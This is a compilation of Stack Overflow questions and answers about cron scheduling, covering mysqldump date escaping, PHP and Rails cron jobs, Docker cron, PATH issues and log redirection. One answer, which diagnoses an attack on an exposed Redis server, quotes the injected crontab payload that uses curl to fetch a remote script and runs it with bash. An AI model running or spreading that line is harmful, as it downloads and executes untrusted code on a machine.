mysqldump --host=HOST --user=USER --password=PASSWORD DATABASE TABLE | gzip > /tmp/table.`date +"\%Y-\%m-\%d"`.gz
What has changed from the OP is the escaping of the date format: date +"\%Y-\%m-\%d" (and I used backticks, but that shouldn't make much of a difference). (Another solution would be to put your original command in a shell script, and execute that one from the crontab instead of the command; it would probably be easier to read/write ^^)
I have a crontab set up that errors out every time I attempt to run it. It works fine in the shell. It's the format I'm using when I attempt to automatically insert the date into the filename of the database backup. Does anyone know the syntax I need to use to get cron to let me insert the date into the filename?
mysqldump -hServer -uUser -pPassword Table | gzip > /home/directory/backups/table.$(date +"%Y-%m-%d").gz
Thanks in advance!
Proper format for a mysqldump dynamic filename in a cron?
You probably have something like a public_html directory, in which you have all the PHP files. Just put the script outside of that directory.
I have this script.php file which I want to run as a cron job on my Linux/Apache server. However, I do not want the public to access www.mycompanyname.com/script.php or to run the script concurrently. How can we prevent that? How can we restrict the script to the server's access only? Is it done using chmod, or by setting something inside the .htaccess file, something along those lines? Any advice?
Run a script.php on cron job on linux/apache server but restrict public access to the php file
First one is easy:
12 9 * * 1-5 <full_path>/job1.php
Second one is tricky. I split that into 3 entries:
15-59 9 * * 1-5 <full_path>/job2.php
* 10-14 * * 1-5 <full_path>/job2.php
0-30 15 * * 1-5 <full_path>/job2.php
Cron syntax:
* * * * * command to be executed
┬ ┬ ┬ ┬ ┬
│ │ │ │ │
│ │ │ │ │
│ │ │ │ └───── day of week (0 - 6) (0 is Sunday, or use names)
│ │ │ └────────── month (1 - 12)
│ │ └─────────────── day of month (1 - 31)
│ └──────────────────── hour (0 - 23)
└───────────────────────── min (0 - 59)
I have to run two cron jobs for the following scenarios:
job1.php should run once a day at 9:12 AM, Monday to Friday (five days a week).
job2.php should run every minute from 9:15 AM to 3:30 PM, Monday to Friday (five days a week).
I have another 4 cron jobs which need to be implemented in my project, but all of those can be derived from the above two scenarios.
Cron job to run every minute from Monday to Friday, from 9:15 AM to 3:30 PM
To delete directories in /TBD older than 1 day:
find /TBD -mtime +1 -type d | xargs rm -f -r
So I have looked at every single script on here regarding deleting directories older than 14 days. The script I wrote works with files, but for some reason it is not deleting the directories. So here is my script:
#!/bin/bash
find /TBD/* -mtim +1 | xargs rm -rf
This code successfully deleted the FILES inside TBD, but it left two directories. I checked the timestamp on them and it is at least 2 days since last modification according to the timestamp, specifically Dec 16 16:10, so I can't figure this out. The crontab I have running this runs every minute and logs, and the log only shows:
+ /scripts/deletebackups.sh: :2:BASH_XTRACEFD=3xargs rm -rf
+ /scripts/deletebackups.sh: :2: BASH_XTRACEFD=3find /TBD/contents TBD/contents -mtime +1
I used 'contents' since the contents are actually people's names in our PXE server. I checked every file and folder INSIDE these two directories and their timestamps are the same as the parent directory, as they should be, but it's still not deleting. Could it be a permissions thing? I wrote the script using sudo nano deletebackups.sh. When I type ls under TBD, on the far left it shows
drwxr-xr-x 3 hscadministrator root 4096 DEC 16 16:10
for each of the two directories that won't delete. I'm not overly familiar with what all those letters mean. Other iterations of this code I have already attempted are:
find /TBD/* -mtime +1 rm -r {} \;
Delete directories older than X days
Have two entries:
To run every Monday at 5 AM:
0 5 * * 1
To run on the 1st of every month at 5 AM:
0 5 1 * *
OR, if you want a single entry, then you may have to do something like this: https://github.com/xr09/cron-last-sunday/blob/master/run-if-today
I generated a cron to run every Monday at 5am:
0 5 1 * 1
The third number, 1, for day of month, has it set to run on the first of every month as well as on Monday. Do I change that 1 to 0 so it ignores the day of month? Otherwise it will run every Monday as well as on the 1st of the month.
run every monday at 5am
If you can use cron, you just have to execute
crontab -e
Or, if you need to run as root:
sudo crontab -e
This will open a text editor so you can modify your crontab, and there you'll have one line for each scheduled command, like this one:
1 0 * * * php /var/www/myBlog/artisan task:run
The command in this line will be executed at the first minute of every day (00:01, or 12:01 am). Here is the explanation of it all:
* * * * * <command to execute>
┬ ┬ ┬ ┬ ┬
│ │ │ │ │
│ │ │ │ │
│ │ │ │ └───── day of week (0 - 6) (0 to 6 are Sunday to Saturday, or use names)
│ │ │ └────────── month (1 - 12)
│ │ └─────────────── day of month (1 - 31)
│ └──────────────────── hour (0 - 23)
└───────────────────────── min (0 - 59)
So, in your case, you'll create a line like this:
0 12 * * 0 <command to execute>
But how do you do that for a task in Laravel? There are many ways; one of them is in my first example: create an artisan command (task:run) and then just run artisan. Or you can just create a route in your app that will call your task every time it is hit:
Route::get('/task/run', array('uses' => 'TaskController@run'));
And then you just have to add it to your crontab, but you'll need something to hit your URL, like wget or curl:
0 12 * * 0 curl http://mysite.com/task/run
I've seen some similar questions at SO but none of then have answered me. I had never heard of CRON before and I'm new to Laravel. What I need is to run a Task once a week to perform some actions on my database (MySql), say every sunday at 12:00 am. How could I achieve this goal?
Running Laravel Task at specific time
According to the PHP command-line options reference (http://php.net/manual/en/features.commandline.options.php), the -f option indicates which file the PHP engine should execute, in this case myscript.php.
What does the "-f" in, say,
* * * * * php -f myscript.php
stand for?
What does -f stand for in "php -f" when running a cron job?
If your list of files from the find output is correct, just pipe it to tar:
find . -name "*.php" -mtime -14 -print | xargs tar cvf backup.tar
You should check the tar options in man. You might want to use, for example, -p (preserve permissions); just look for useful options in man and use whatever you need.
[Addendum] If your files might contain spaces or newlines, prefer -print0 and xargs -0 to use null characters as separators:
find . -name "*.php" -mtime -14 -print0 | xargs -0 tar cvf backup.tar
And to add it to cron, the simplest way, if your distro supports it, is to put your script in:
/etc/cron.weekly
Otherwise you have to modify the crontab:
crontab -e
and put there a line like:
0 3 * * 6 <your script>
It runs the script at 3am every Saturday; the last field is the day of the week, where 0 or 7 is Sunday.
man 5 crontab:
field          allowed values
-----          --------------
minute         0-59
hour           0-23
day of month   1-31
month          1-12 (or names, see below)
day of week    0-7 (0 or 7 is Sun, or use names)
I have a server whose files are modified every now and again. We want to have a script or cron job that runs every 7 days and finds any PHP files that have been modified or created in the last 14 days and puts them in a tar or zip file on the server so it can be downloaded. This command finds the right files:
find . -name "*.php" -mtime -14 -print
What else do I need to do?
Copying / Tarring Files that have been modified in the last 14 days
The best way is to call the controller from the command line in the cron job:
php /path/to/index.php controller >> /dev/null
You can run controllers via the command line in CI, see here.
I am trying to set up a cron job for a site built in CodeIgniter. I've got access to the cPanel cron feature; can anyone suggest the best way to set up a cron job using cPanel? Since I'm using CodeIgniter, I am not sure how to call a controller within a cron job. E.g. http://admin.com/sites/publish/ : how would I access this publish function within the sites controller using a cron job?
Cron jobs in codeigniter
Every 10 minutes between 09:00 and 17:00 on weekdays (Monday - Friday):
*/10 09-17 * * 1-5 /path/to/file
I'm trying to set a cron job up to run every ten minutes on weekdays between 9am and 5pm. I have a bunch of jobs set up now to run on weekdays at 10-minute intervals (so 48 jobs). Is there a way to do this in one cron job?
Cron Jobs between x and y on weekdays
I can see the dreaded smart quotes in your cron entry. This often happens when you copy-paste from word processors. Backspace over those abominations and re-type normal quotes. Change:
* * * * * Rscript “/Users/Home/Desktop/David Studios/Scraper/compiler.R”
to
* * * * * Rscript "/Users/Home/Desktop/David Studios/Scraper/compiler.R"
See the difference? It's subtle and easy to miss.
Update: I see you've made the above change and it's still not working for you. Verify that Rscript is in the $PATH environment variable for the user that owns this crontab. Alternatively, you can simply specify the fully qualified path to Rscript directly in the cron entry. You can find that quickly on the command line with the following command:
which Rscript
Update #2: I see by your comments that the fully qualified path to Rscript is /usr/local/bin/Rscript. I'm guessing /usr/local/bin is not in the path for the user who owns this crontab. Try using the fully qualified path, like this:
* * * * * /usr/local/bin/Rscript "/Users/Home/Desktop/David Studios/Scraper/compiler.R"
For some reason my R script will not run with a crontab. I have it set for every minute right now for testing, but will change it once it works. Any ideas?
* * * * * Rscript “/Users/Home/Desktop/David Studios/Scraper/compiler.R”
Also, this was working as just a normal command in Terminal.
Schedule an Rscript crontab every minute
I suspect your problem lies in a missing environment variable, specifically the all-important $PATH. When you run this:
php -q /tmp/phpinfo.php
the system must work out what program you mean by php. It does this by looking, in order, through the directories in the current $PATH environment variable. Executed from a normal shell, your environment is set up in such a way that it finds the CLI version of PHP, as you expect. However, when cron executes a command, it does so without all the environment variables that your interactive shell would set up. Since there will probably be other executables called php on your system, for different "SAPIs", it may pick the "wrong" one - in your case, the cgi-fcgi executable, according to the output you report from php_sapi_name(). To fix this, first find the path to the correct php executable in a normal shell by typing this:
which php
This should give you a path like /usr/bin/php. You can go one further and check if this is actually a "symbolic link" pointing at a different filename:
ls -l $(which php)
(you'll see an arrow in the output if it is, like /usr/bin/php -> /usr/bin/php5-cli)
Then take this full path to the PHP executable and use that in your crontab entry, so it looks something like this:
50 8 * * * /usr/bin/php5-cli -q /tmp/phpinfo.php > /tmp/phpinfo
I noticed this problem after a PHP script run from cron started to time out, even though that was not an issue when it was run manually from the command line (PHP's max_execution_time is 0 for CLI by default). So I tried to run a simple cron job such as:
50 8 * * * php -q /tmp/phpinfo.php > /tmp/phpinfo
The script would just call phpinfo(). Surprisingly, it wrote out phpinfo in HTML format, which suggested that it was not run as CLI, and max_execution_time was 30 in the output. Running the script manually from the command line, such as
php -q /tmp/phpinfo.php | less
wrote out the phpinfo in text format and max_execution_time was 0 in the output. I know there must be a configuration issue somewhere, but I just could not find where the problem is. This is happening on a production server, which I have complete control of. Running the same script from cron on my development machine worked fine. Here is the summary of the difference:
function             | CLI                    | cron
php_sapi_name        | cli                    | cgi-fcgi
php_ini_loaded_file  | /usr/local/lib/php.ini | /usr/local/lib/php.ini
Running php from cron did not run as CLI
Cron doesn't run the script from the 'folder' you are in, so you will need to specify a full path:
$flyer = file_get_contents(dirname(__FILE__) . DIRECTORY_SEPARATOR . "flyer.html");
I'm running a PHP script that uses file_get_contents in order to mail a list with what's inside that remote file. If I run the script manually everything works fine, but when I leave it and wait for the cron to run, it doesn't get that remote content... Is that possible? I copy here the bit of the code where I think the problem is:
$flyer = file_get_contents('flyer.html');
$desti = $firstname." ".$lastname;
$mail = new phpmailer();
$mail->IsSMTP();
$mail->CharSet = 'UTF-8';
$mail->SMTPAuth = true;
$mail->SMTPSecure = "ssl";
$mail->Host = "orion.xxxx.com"; // line to be changed
$mail->Port = 465; // line to be changed
$mail->Username = '[email protected]'; // line to be changed
$mail->Password = 'xxxx90'; // line to be changed
$mail->FromName = 'Bob'; // line to be changed
$mail->From = '[email protected]'; // line to be changed
$mail->AddAddress($email, $desti);
$mail->Subject = 'The Gift Store'; // to be changed
if ($cover_form == '1'){ $mail->MsgHTML($long10);}
else if ($cover_form == '2'){ $mail->MsgHTML($customer);}
else if ($cover_form == '3'){ $mail->MsgHTML($freedoers);}
else if ($cover_form == '4'){ $mail->MsgHTML($freelongform);}
else if ($cover_form == '5'){ $mail->MsgHTML($freestoreshort);}
else if ($cover_form == '6'){ $mail->MsgHTML($getasiteshort);}
else if ($cover_form == '7'){ $mail->MsgHTML($flyer);}
else {}
cron job won't open file_get_contents
You actually have two questions here.
Why does it print "stdin: is not a tty"?
This warning message is printed by bash -l. The -l (--login) option asks bash to start a login shell, e.g. the one which is usually started when you enter your password. In this case bash expects its stdin to be a real terminal (e.g. the isatty(0) call should return 1), and that's not true if it is run by cron, hence this warning. Another easy way to reproduce this warning, and a very common one, is to run this command via ssh:
$ ssh [email protected] 'bash -l -c "echo test"'
Password:
stdin: is not a tty
test
It happens because ssh does not allocate a terminal when called with a command as a parameter (one should use the -t option for ssh to force terminal allocation in this case).
Why did it not work without -l?
As correctly stated by @Cyrus in the comments, the list of files which bash loads on start depends on the type of the session. E.g. for login shells it will load /etc/profile, ~/.bash_profile, ~/.bash_login, and ~/.profile (see INVOCATION in the bash(1) manual), while for non-login shells it will only load ~/.bashrc. It seems you defined your http_proxy variable only in one of the files loaded for login shells, but not in ~/.bashrc. You moved it to ~/.wgetrc and that's correct, but you could also define it in ~/.bashrc and it would have worked.
I'm getting the following mail every time I execute a specific cron job. The called script runs fine when I'm calling it directly and even from cron. So the message I get is not an actual error, since the script does exactly what it is supposed to do. Here is the cron.d entry:
* * * * * root /bin/bash -l -c "/opt/get.sh > /tmp/file"
and the get.sh script itself:
#!/bin/sh
#group and url
groups="foo"
url="https://somehost.test/get.php?groups=${groups}"
# encryption
pass='bar'
method='aes-256-xts'
pass=$(echo -n $pass | xxd -ps | sed 's/[[:xdigit:]]\{2\}/&/g')
encrypted=$(wget -qO- ${url})
decoded=$(echo -n $encrypted | awk -F '#' '{print $1}')
iv=$(echo $encrypted | awk -F '#' '{print $2}' |base64 --decode | xxd -ps | sed 's/[[:xdigit:]]\{2\}/&/g')
# base64 decode input and save to file
output=$(echo -n $decoded | base64 --decode | openssl enc -${method} -d -nosalt -nopad -K ${pass} -iv ${iv})
if [ ! -z "${output}" ]; then
    echo "${output}"
else
    echo "Error while getting information"
fi
When I'm not using the bash -l syntax the script hangs during the wget process. So my guess would be that it has something to do with wget and putting the output to stdout. But I have no idea how to fix it.
"stdin: is not a tty" from cronjob
% signs in a crontab command are converted to newlines, and all data after the first % is sent to the command's stdin. Replace each % with \%. (And you only had 4 time fields: * * * *; you need 5 (you later fixed the question).)
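Applied to the command from the question, the crontab entry becomes something like the following (the schedule of nightly at 03:00 is only an example):
0 3 * * * mysqldump -u"root" myDB | gzip > mydb_`date +\%d-\%m-\%Y`.sql.gz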
This question already has answers here: Is there a special restriction on commands executed by cron? [duplicate] (2 answers). I can use this command:
mysqldump -u"root" myDB | gzip > mydb_`date +%d-%m-%Y`.sql.gz
but when run in crontab:
* * * * * mysqldump -u"root" myDB | gzip > mydb_`date +%d-%m-%Y`.sql.gz
(this error is caused by the date function; when I remove it, crontab runs fine) on Ubuntu, it produces this error in the log file:
ubuntu CRON[xxxx] (user) CMD(mysqldump -u"root" myDB| gzip > mydb_`date+)
ubuntu CRON[xxxx] (CRON) error ( grandchild #5353 failed with exit status 2)
ubuntu CRON[xxxx] (CRON) info (no MTA installed, discarding output)
Backup database use crontab with date function [duplicate]
If you are using Bundler for your application, then you don't need to use "/usr/local/bin/rake" as the path for rake; you can just use bundle exec rake. So your new script will be:
#!/bin/sh
source /usr/local/rvm/scripts/rvm
cd /home/p1r65759/apps/abbc/
bundle exec rake refresh_events RAILS_ENV=production
bundle exec will work because you are already in your project directory. And don't forget to include rake in your Gemfile.
I've upgraded to rails 3.0.9 which has introduced the rake issues. I've gotten it all resolved except for a problem with a cron job.This used to work:#!/bin/sh source /usr/local/rvm/scripts/rvm cd /home/p1r65759/apps/abbc/ /usr/local/bin/rake refresh_events RAILS_ENV=productionBut now I get this error: You have already activated rake 0.8.7, but your Gemfile requires rake 0.9.2. Consider using bundle exec. /home/p1r65759/apps/abbc/Rakefile:4:in `' (See full trace by running task with --trace)How do I modify my script to use bundle exec so it will use the proper version of rake and run successfully? Thanks.
cron and bundle exec problem
Redirect the output of the two you don't care about to /dev/null if you don't ever want to see the output, or to some file if you do.
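A sketch of what such a crontab could look like; the schedules and script paths below are made up for illustration:
# no mail for these two: their output (and errors) is discarded
0 1 * * * /path/to/job_two.sh > /dev/null 2>&1
0 2 * * * /path/to/job_three.sh > /dev/null 2>&1
# this one still mails you whenever it prints anything, e.g. on failure
0 3 * * * /path/to/job_one.sh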
I have 3 jobs in my crontab. I want to receive emails if only 1 of them fails and not for the other two. Is there any way to restrict emails to one type of cron job?
Multiple cronjob emails
You can use backgroundrb. This, however, will eat up memory away from your main Rails app, as it will spawn one Ruby instance exclusive to backgroundrb. You can also define a SystemController (or equivalent) in your main application, with various actions corresponding to the various household tasks your application should perform. You can "prod" it from crontab using wget or curl, the advantage being that it shares resources with your main application. Depending on how paranoid you are, and on how vulnerable exposing such a controller to (possibly) the outside world would make you to DOS or other attacks, you may choose to block access to this controller's URL from addresses other than the loopback (ideally in your reverse proxy, alternatively from the controller itself).
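A minimal crontab sketch of the "prod it with curl" approach; the URL and action name are hypothetical:
# hit the mail-sending action once a minute, via the loopback interface only
* * * * * curl -s http://127.0.0.1/system/deliver_due_emails > /dev/null 2>&1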
I have an application that checks a database every minute for any emails that are supposed to be sent out at that time. I was thinking about making this a rake task that would be run by a cron job every minute. Would there be a better solution to this?From what I have read, this isn't ideal because rake has to load the entire rails environment every minute and this becomes expensive.Thoughts?Thanks.
Best rails solution for a mailer that runs every minute
Unfortunately, the latest macOS versions have put an additional layer of security in place that can't be bypassed. But I found the following workaround. Since I am not changing the system, the following solution works for me. I had to give the program full disk access via: System Preferences -> Security & Privacy -> Privacy -> Full Disk Access -> Add Program.
I am trying to automate crontab addition in Mac Catalina 10.15.5 via command:echo -e "* * * * * \run.sh"|crontab -this command replicatescrontab -ecommand and adds the required crontab in the system.But it asks for permission which is not removable via automation.a. Sudo command requires user to enter password, which is again not possible to be automated.b. Tried creating a file and then adding it to crontab viacrontab filepath, but that also requires above elevation.
"Terminal" would like to administer your computer. Administration can include passwords
You will need to set the cron job to run every half an hour, and then look for work based on the timezone that the user is in.So for example you need to send a daily email digest at 6am in each timezone. Let's assume that you have the events for each user in a collection of some kind.Each user record needs to include a timezone that the user is in. When the cron job runs, you do a query to find the users that need to receive a digest that are in the timezone where it is currently 6am. Then you send the email and clear out the queued events.
I have one cron which I want to run around 6:00 am in IST and same cron should also run same time 6:00 am EAT.I am usingsynced-cronfor running cron jobs on my meteor server.If I have only few timezones to support I would have ran this cron 2 times a day and it would have worked but I have multiple timezones to support in future. How can I automate same thing with little effort.
How to run cron on same time in different time zones?
You can write another Python script (B) to call your original Python script (A) using Popen from subprocess. In script (B), ask the program to wait for script (A). If 'A' exits with an error code, restart it from B. I provide an example for python_code_B.py: import subprocess filename = 'my_python_code_A.py' while True: """However, you should be careful with the '.wait()'""" p = subprocess.Popen('python '+filename, shell=True).wait() """# if there is an error from running 'my_python_code_A.py', the while loop repeats; otherwise the program breaks out of the loop""" if p != 0: continue else: break This will generally work well on Unix / Windows systems. Tested on Win7/10 with the latest code update. Also, please run python_code_B.py from a 'real terminal', which means running it from a command prompt or terminal, and not in IDLE.
I run a Python Discord bot. I import some modules and have some events. Now and then, it seems like the script gets killed for some unknown reason. Maybe because of an error/exception or some connection issue maybe? I'm no Python expert but I managed to get my bot working pretty well, I just don't exactly understand how it works under the hood (since the program does nothing besides waiting for events). Either way, I'd like it to restart automatically after it stops.I use Windows 10 and just start my program either by double-clicking on it or through pythonw.exe if I don't want the window. What would be the best approach to verify if my program is still running (it doesn't have to be instant, the verification could be done every X minutes)? I thought of using a batch file or another Python script but I have no idea how to do such thing.Thanks for your help.
Automatically restart a Python program if it's killed
This is indeed an attack. If you check your redis keys after this happens you will see few "string" keys like this: "Backup1", "Backup2", "Backup3".The value of these will be something like this:"\t\n*/2 * * * * curl -s https://transfer.sh/QMvW6/tmp.M8pAEgBA6T > .cmd && bash .cmd\n\t"This is meant to modify your crontab.Bottom line is - don't have redis port opened to the world.
I have set up my redis-server so thatCONFIG GET dir --> "/var/lib/redis"andCONFIG GET dbfilename --> "redis.rdb".However, after my server has been running a few hours or a few days, I start getting the"Failed opening .rdb for saving: Permission denied"error.If I again doCONFIG GET dir --> "/var/spool/cron"andCONFIG GET dbfilename --> "root". I have tried looking all over the place for some kind of understanding of what is happening, but without avail.If I simply restart my redis-server, then the config is once again reset to the original settings that I set up in the "redis.conf" file.
Redis config dir periodically modified to "/var/spool/cron" with "Failed opening .rdb for saving: Permission denied" error
To exclude the grep result from the ps output, do ps -aux | grep -v grep | grep sidekiq, or do a regex search of the process name, i.e. [s] followed by the rest of the process name: ps -aux | grep [s]idekiq To avoid such conflicts in the search, use process grep, pgrep, directly with the process name: pgrep sidekiq An efficient way to use pgrep would be something like below: if pgrep sidekiq >/dev/null then echo "Process is running." else echo "Process is not running." fi
I have created restart.sh with followin code#!/bin/bash ps -aux | grep sidekiq > /dev/null if [ $? -eq 0 ]; then echo "Process is running." else echo "Process is not running." fiTo check if sidekiq process is running or not. I will put this script in cron to run daily so if sidekiq is not running, it will start automatically.My problem is, withps -aux | grep sidekiqeven when the process is not running, it showsmyname 27906 0.0 0.0 10432 668 pts/0 S+ 22:48 0:00 grep --color=auto sidekiqinstead of nothing. This gets counted in grep hence even when the process is not running, it shows as "sidekiq" process is running. How to not count this result ? I believe I have to use awk but I am not sure how to use it here for better filtering.
Check if a process is running and if not, restart it using Cron
There is one main advantage of Supervisor: the task you set there runs constantly. This means that when the process finishes, a new one starts immediately. Crontab can start a process at most once a minute! So if you have a task like queue:work it is much better to use Supervisor over Crontab.
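For reference, a typical supervisord program section for this worker could look roughly like the following; the command is taken from the question, while the log path and user are assumptions:
[program:laravel-queue-worker]
command=php /var/www/laravelProj/artisan queue:work --daemon --tries=3
autostart=true
autorestart=true
user=www-data
redirect_stderr=true
stdout_logfile=/var/log/laravel-queue-worker.log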
I have to run a laravel commandphp artisan queue:work --daemonto run jobs stored on Beanstalkd queues.I have come across two possible solutions:Run commands using Supervisord:Register a command in the config files of Supervisord and start it.Run commands using CronJobs:*/1 * * * * /usr/bin/php /var/www/laravelProj/artisan queue:work --daemon --tries=3Can someone please explain what way should I go and what would be the best for performance enhancement.
Supervisor VS CronJobs
You are actually including a sudo in there. Sudo requires a password, you would have to add a configuration item in sudoers to run that script passwordless. Your other option is to add it to the root cron. Use @Haleemur's redirection command to redirect the output to the logs. I would actually suggest using the following as well just in case it fails and outputs to STDERR@reboot python /home/Desktop/Application.py >> /home/Desktop/log_file 2>&1UPDATE:try running the following command from the terminalpython /home/Desktop/Application.py >> /home/Desktop/log_file 2>&1if it works in the command line, there is no reason it shouldn't work in cron.
I am using crontab to autostart the program, using the following command in cronatb@reboot sudo python /home/Desktop/Appllication.pyIs it possible to write all the logs (errors and other stuff) by appending something to the above command, so that cron writes all errors/ any related events to a log ?UPDATE: The code prints values in the python idle terminal when run individually using the print command. How do I make this data which is printed on the terminal to be written to the log file. for ex, if my code is like print "food morning" , how do I get this to be written into the log file instead of printing on terminal.TEST CODE:import time while(1): print "testing" time.sleep(5)
writing logs using crontab
If you are using the new Console for your projects in app engine then this is how it will look like after you have selected a project to view fromhttps://console.developers.google.com/projectusing your google account.Hope it helps!
This might be a dumb question, but, i just can't find cron jobs panel, I've got an app in java and I need to refresh the data every day, so I create this cron.xml inside WEB-INF:<?xml version="1.0" encoding="UTF-8"?> <cronentries> <cron> <url>/refreshdata</url> <description>Daily data refresh cron task </description> <schedule>every day 05:00</schedule> </cron> </cronentries>I deployed it, but it doesnt work and I cant find the "cron job panel" in console to monitor it or even check if GAE recognizes it...Documentation says " (You can verify the Cron job you just deployed by clicking Cron Jobs in the left nav pane.)https://i.stack.imgur.com/1niVt.png"but it doesn't exist anymore, gae's console UI changed, where it is now? I tried in logs without successit is something wrong with my .xml?Any help would be apreciated, thanks.
Monitor google app engine cron jobs in console?
Make sure you are starting Cygwin with Administrator privileges. Right click on your Cygwin shortcut, then 'Run as Administrator'.
I am trying to set-up cron on my CYGWIN installation on a Win7 box. I am using the procedure mentiond here:How do you run a crontab in Cygwin on Windows?This is how I try to start the cron-service:> cygrunsrv -I cron -p /usr/sbin/cron -a -DThe response that I get is:cygrunsrv: Error installing a service: OpenSCMManager: Win 32 error 5: Access deniedAny tips on how to proceed?
cygwin: Starting cron as a service (access denied)
Yes, you can do this. You'll just need to assign an identifier to the task being written to crontab:whenever --update-crontab some_identifier_nameIt will generate an entry in crontab like this:# Begin Whenever generated tasks for: some_identifier_name 0,5,10,15,20,25,30,35,40,45,50,55 * * * * /bin/bash -l -c 'cd /var/www/test/releases/20120416183153 && script/rails runner -e production '\''Model.some_method'\'' >> /tmp/cron_log.log 2>&1' # End Whenever generated tasks for: some_identifier_nameThen whenever you call the command above it will only update where it finds the identifier you specified.
I am using:Ruby 1.9.2whenever 0.7.2capistrano 2.9.0capistrano-ext 1.2.1I am using whenever in conjunction with Capistrano on deploys to manage my crontab files.I noticed that it completely rewrites my crontab files each time.I'd like to be able to set environment variables in cron to control PATH and MAILTO settings, which are regular cron environment variables.Is there a way to make whenever not overwrite the entire crontab file, so that I can add customizations to my crontab file and be sure that they will persist?
Can the whenever gem preserve existing lines in a crontab file?
Assuming a UNIX-like operating system, you could set up a cron job that points to a shell script like the following: #!/bin/sh cd [source directory] ftp -n [destination host]<<END user [user] [password] put [source file] quit END Depending on your ftp client defaults and the source file type you may need to specify binary prior to the put.
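The script itself can then be triggered from cron like any other command; the schedule and paths below are placeholders:
# upload every night at 01:00 and keep a log of the transfer
0 1 * * * /home/user/scripts/ftp_upload.sh >> /home/user/logs/ftp_upload.log 2>&1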
Is it possible to use CRON to upload a file via FTP? If yes how can I call FTP to run an upload?
cron jobs to upload a file via FTP
The solution is docker system prune -f, which will remove all stopped containers, all unused networks, and all dangling images and build caches. You can use crontab to run this command periodically. Look at this example of a crontab entry: 0 3 * * * /usr/bin/docker system prune -f You can also put this command into your script: #!/bin/sh docker stop registry docker system prune -f docker run -d -p 5000:5000 --restart=always --name registry -v /etc/docker/registry/config.yml:/etc/docker/registry/config.yml registry:2
docker system prune wants a y/n answer. How do I pass it in a shell script? My shell script: #!/bin/sh docker stop registry docker system prune docker run -d -p 5000:5000 --restart=always --name registry -v /etc/docker/registry/config.yml:/etc/docker/registry/config.yml registry:2 I've configured the cron expression to run every minute: crontab -e * * * * * /bin/sh /home/sansli/dc.sh How do I test it? I'm checking the created date with docker ps -a
How to write shell script for docker system prune as schedule
In a Dockerfile, the RUN command is only executed when building the image. If you want to start cron when you start your container, you should run cron in CMD. I modified your Dockerfile by removing RUN service cron start and changing your ENTRYPOINT. FROM ruby:2.4.0-slim RUN apt-get update RUN apt-get install -qq -y --no-install-recommends build-essential libpq-dev cron postgresql-client RUN cp /usr/share/zoneinfo/Europe/Moscow /etc/localtime ENV LANG C.UTF-8 ENV RAILS_ENV production ENV INSTALL_PATH /app RUN mkdir $INSTALL_PATH RUN touch /log/cron.log ADD Gemfile Gemfile.lock ./ WORKDIR $INSTALL_PATH RUN bundle install --binstubs --without development test COPY . . RUN bundle exec whenever --update-crontab CMD cron && bundle exec puma It's a best practice to reduce the number of layers an image has; for example, you should always combine RUN apt-get update with apt-get install in the same RUN statement, and clean the apt files afterwards with rm -rf /var/lib/apt/lists/*: FROM ruby:2.4.0-slim RUN apt-get update && \ apt-get install -qq -y --no-install-recommends build-essential libpq-dev cron postgresql-client && \ rm -rf /var/lib/apt/lists/* && \ cp /usr/share/zoneinfo/Europe/Moscow /etc/localtime ENV LANG C.UTF-8 ENV RAILS_ENV production ENV INSTALL_PATH /app RUN mkdir $INSTALL_PATH && \ touch /log/cron.log ADD Gemfile Gemfile.lock ./ WORKDIR $INSTALL_PATH RUN bundle install --binstubs --without development test COPY . . RUN bundle exec whenever --update-crontab CMD cron && bundle exec puma
My crontasks fromschedule.rbdoesn't work on docker container, butcrontab -lresult already contains this lines:# Begin Whenever generated tasks for: /app/config/schedule.rb 45 19 * * * /bin/bash -l -c 'bundle exec rake stats:cleanup' 45 19 * * * /bin/bash -l -c 'bundle exec rake stats:count' 0 5 * * * /bin/bash -l -c 'bundle exec rake stats:history' # End Whenever generated tasks for: /app/config/schedule.rbI can run this commands manually in container and it works. It seems like cron doesn't start.Dockerfile:FROM ruby:2.4.0-slim RUN apt-get update RUN apt-get install -qq -y --no-install-recommends build-essential libpq-dev cron postgresql-client RUN cp /usr/share/zoneinfo/Europe/Moscow /etc/localtime ENV LANG C.UTF-8 ENV RAILS_ENV production ENV INSTALL_PATH /app RUN mkdir $INSTALL_PATH RUN touch /log/cron.log ADD Gemfile Gemfile.lock ./ WORKDIR $INSTALL_PATH RUN bundle install --binstubs --without development test COPY . . RUN bundle exec whenever --update-crontab RUN service cron start ENTRYPOINT ["bundle", "exec", "puma"]
rails, whenever and docker - cron tasks doesn't run
The xdotool command is an automation tool for X11 which allows you to simulate keyboard/mouse input, but since crontab runs independently, you are required to define the DISPLAY variable to specify which X Window System display server to use. Normally when you log in to the desktop this variable is assigned automatically, but crontab runs jobs in an isolated environment (it doesn't even have a tty associated), especially when you run commands via the root account. So in short, you should define your job like: */1 * * * * DISPLAY=:0 /usr/local/bin/refresh.sh Or you can define variables at the beginning of the file (in the case of Vixie cron). See: Variables in crontab? Also make sure the user which is running the job has been granted access to the selected X display. If you need to grant the access, you need to assign the permission via the xhost and setfacl commands and specify an extra XAUTHORITY variable; see: Xdotool using "DISPLAY=:0" for more details.
I am new to using crontab, and I've been trying to get a simple cron job. I want press F5 every 1 minute to refresh Mozzila Firefox. I am using xdotool for press F5. I have script/usr/local/bin/refresh.sh:#!/bin/bash xdotool search --name "Mozilla Firefox" key F5If i run it in command line it works fine. And permission:-rwxr-xr-x. 1 root root 89 15. čec 10.32 refresh.shIncrontabi have:*/1 * * * * cd /usr/local/bin && sh refresh.shBut script run by cron doesnt work. Can anyone tell me what i do wrong?
Cron xdotool doesn't run
Although this is a very old question, there is no correct answer posted, so let me leave this here for the next guy. Magento's cron_schedule table is only populated with cron jobs that are scheduled to run in the near future. The reason you're not seeing your cron job in the table is because it only runs once a day, precisely at 23:55. Magento will add this cron job to the cron_schedule table at around 23:45, depending on your server cron job configuration and Magento's cron job settings in System > Configuration > System > Cron. Take note of the Generate Schedules Every and Schedule Ahead for settings, which define how often and how far ahead Magento generates the schedule.
I made magento module which export product in csv file. Now i want to run cronjob every day at 23.55. I set config.xml as it is written inmagento cronjob wiki.My code:<crontab> <jobs> <gcompany_runprofilescronjob> <schedule> <cron_expr>55 23 * * *</cron_expr> </schedule> <run> <model>export/export_csv::runprofilescronjob</model> </run> </gcompany_runprofilescronjob> </jobs> </crontab>I also set cronjob on server. When cronjob run, all cronjobs in magento are stored in database table cron_schedule but not my gcompany_runprofilescronjob. If i set different interval for example:<cron_expr>*/1 * * * *</cron_expr>My cronjob is written in database but in execute every minute which i don't want... I want that my function is executed every day at 23.55. Any suggestions what i am doing wrong?
magento cron job and cron_scheduler table
